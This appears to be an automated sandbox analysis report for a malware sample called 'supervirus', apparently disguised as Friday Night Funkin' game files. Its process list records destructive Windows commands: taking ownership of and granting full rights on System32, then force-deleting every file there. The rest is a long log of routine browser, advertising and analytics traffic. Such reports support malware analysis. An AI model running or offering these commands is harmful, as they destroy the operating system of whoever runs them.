C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & takeown /F C:\Windows\System32 /A /R /d y
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32 /A /R /d y
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.27.928741829\298029825" -childID 24 -isForBrowser -prefsHandle 6428 -prefMapHandle 6860 -prefsLen 28860 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71496b8d-eb96-460c-8c99-ce59bda8ce32} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5540 1bf21836858 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & ICACLS C:\Windows\System32 /grant administrators:F /T
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32 /grant administrators:F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cacls C:\Windows\System32
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\cacls.exe
cacls C:\Windows\System32
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cd C:\Windows\System32 && del /f/q/s *.* > nul
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.28.1797556655\1587954296" -childID 25 -isForBrowser -prefsHandle 7824 -prefMapHandle 11168 -prefsLen 31349 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66f8338-63e3-4ad9-9021-9eda756f5e1c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6900 1bf14440c58 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:62568 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 52.25.179.107:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:62574 | tcp | |
| US | 8.8.8.8:53 | 107.179.25.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gamejolt.com | udp |
| US | 104.18.5.160:80 | gamejolt.com | tcp |
| US | 8.8.8.8:53 | gamejolt.com | udp |
| US | 8.8.8.8:53 | gamejolt.com | udp |
| US | 8.8.8.8:53 | 160.5.18.104.in-addr.arpa | udp |
| US | 104.18.5.160:443 | gamejolt.com | tcp |
| US | 104.18.5.160:443 | gamejolt.com | udp |
| US | 8.8.8.8:53 | s.gjcdn.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 8.8.8.8:53 | s.gjcdn.net | udp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 8.8.8.8:53 | s.gjcdn.net | udp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | tcp |
| US | 104.18.24.184:443 | s.gjcdn.net | udp |
| US | 8.8.8.8:53 | 184.24.18.104.in-addr.arpa | udp |
| US | 104.18.24.184:443 | s.gjcdn.net | udp |
| US | 8.8.8.8:53 | firebase.googleapis.com | udp |
| US | 8.8.8.8:53 | firebase.googleapis.com | udp |
| US | 8.8.8.8:53 | firebase.googleapis.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firebaseremoteconfig.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaseremoteconfig.googleapis.com | tcp |
| GB | 172.217.16.234:443 | firebaseremoteconfig.googleapis.com | tcp |
| GB | 172.217.16.234:443 | firebaseremoteconfig.googleapis.com | tcp |
| GB | 172.217.16.234:443 | firebaseremoteconfig.googleapis.com | tcp |
| US | 8.8.8.8:53 | firebaseremoteconfig.googleapis.com | udp |
| US | 8.8.8.8:53 | firebaseremoteconfig.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaseremoteconfig.googleapis.com | udp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 104.18.25.184:443 | m.gjcdn.net | tcp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | tcp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 184.25.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| GB | 99.86.114.119:443 | global.proper.io | tcp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| US | 8.8.8.8:53 | 119.114.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | tcp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | tcp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 18.244.114.7:443 | abcheck.proper.io | tcp |
| GB | 18.244.114.7:443 | abcheck.proper.io | tcp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | 2.73.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.77.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 52.11.10.79:443 | bids.proper.io | tcp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 8.8.8.8:53 | global.px.quantserve.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 8.8.8.8:53 | global.px.quantserve.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 91.228.74.200:443 | global.px.quantserve.com | tcp |
| US | 52.32.42.129:443 | bids.proper.io | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 91.228.74.200:443 | global.px.quantserve.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | d2fashanjl7d9f.cloudfront.net | udp |
| US | 8.8.8.8:53 | d2fashanjl7d9f.cloudfront.net | udp |
| US | 8.8.8.8:53 | 200.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.42.32.52.in-addr.arpa | udp |
| GB | 18.245.187.55:443 | d2fashanjl7d9f.cloudfront.net | tcp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 142.250.187.238:443 | www3.l.google.com | udp |
| DE | 91.228.74.166:443 | pixel.quantserve.com | tcp |
| US | 8.8.8.8:53 | 55.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.10.11.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| IE | 52.208.44.24:443 | rtb.gumgum.com | tcp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| GB | 13.224.223.9:443 | d1ykf07e75w7ss.cloudfront.net | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | 24.44.208.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.149.71.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.223.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| GB | 52.84.90.126:443 | config.aps.amazon-adsystem.com | tcp |
| GB | 52.84.90.126:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.90.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | b-code.liadm.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | aps.zqtk.net | udp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 8.8.8.8:53 | detgh1asa1dg4.cloudfront.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| FR | 172.234.63.227:443 | aps.zqtk.net | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | detgh1asa1dg4.cloudfront.net | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| US | 8.8.8.8:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 104.22.5.69:443 | id.hadron.ad.gt.cdn.cloudflare.net | tcp |
| DE | 184.30.211.26:443 | e4536.g.akamaiedge.net | tcp |
| GB | 18.245.143.100:443 | tags.crwdcntrl.net | tcp |
| GB | 18.165.227.10:443 | detgh1asa1dg4.cloudfront.net | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | 173.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.63.234.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.ad.gt | udp |
| US | 104.22.5.69:443 | a.ad.gt | tcp |
| US | 8.8.8.8:53 | a.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | a.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.smartadserver.com | udp |
| US | 44.239.184.8:443 | ids.ad.gt | tcp |
| US | 44.239.184.8:443 | ids.ad.gt | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | sync.go.sonobi.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | p.ad.gt | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 104.22.5.69:443 | p.ad.gt | tcp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | pug-ams-bc.pubmnet.com | udp |
| US | 8.8.8.8:53 | rtb-csync-euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| IE | 34.254.52.227:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | pug-ams-bc.pubmnet.com | udp |
| US | 8.8.8.8:53 | rtb-csync-euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 104.22.5.69:443 | p.ad.gt | tcp |
| US | 8.8.8.8:53 | pixels.ad.gt | udp |
| US | 104.22.5.69:443 | pixels.ad.gt | tcp |
| US | 104.22.5.69:443 | pixels.ad.gt | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | iad-2-sync.go.sonobi.com | udp |
| US | 8.8.8.8:53 | am1-direct-bgp.contextweb.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | iad-2-sync.go.sonobi.com | udp |
| US | 104.22.4.69:443 | pixels.ad.gt | tcp |
| US | 8.8.8.8:53 | am1-direct-bgp.contextweb.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | p.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | p.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | pixels.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | pixels.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 26.211.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.184.239.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.4.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.52.254.34.in-addr.arpa | udp |
| NL | 185.89.210.90:443 | ib.anycast.adnxs.com | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| NL | 198.47.127.205:443 | pug-ams-bc.pubmnet.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.net.akadns.net | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | tcp |
| FR | 217.182.178.233:443 | rtb-csync-euw2.smartadserver.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 69.166.1.66:443 | iad-2-sync.go.sonobi.com | tcp |
| NL | 208.93.169.131:443 | am1-direct-bgp.contextweb.com | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | tcp |
| US | 35.244.159.8:443 | u.openx.net | udp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| NL | 185.89.210.90:443 | ib.anycast.adnxs.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync-euw2.smartadserver.com | tcp |
| US | 69.166.1.66:443 | iad-2-sync.go.sonobi.com | tcp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 54.191.164.137:443 | usync.proper.io | tcp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.178.182.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 8.8.8.8:53 | 137.164.191.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 104.18.5.160:443 | gamejolt.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 104.18.24.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| GB | 142.250.178.10:443 | firebaselogging-pa.googleapis.com | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.167.233.64.in-addr.arpa | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| GB | 142.250.200.34:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| GB | 108.138.217.66:443 | hb.yellowblue.io | tcp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| US | 34.149.20.76:443 | ssc.33across.com | tcp |
| US | 34.149.20.76:443 | ssc.33across.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| US | 8.8.8.8:53 | apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 69.166.1.9:443 | apex.go.sonobi.com | tcp |
| DE | 3.124.64.248:443 | tlx.3lift.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| IE | 79.125.108.226:443 | ap.lijit.com | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| BE | 23.55.97.75:443 | a.teads.tv | tcp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| NL | 178.250.1.8:443 | bidder.criteo.com | tcp |
| DE | 18.196.187.137:443 | btlr.sharethrough.com | tcp |
| DE | 18.196.187.137:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | iad-2-apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | eu-tlx.3lift.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | udp |
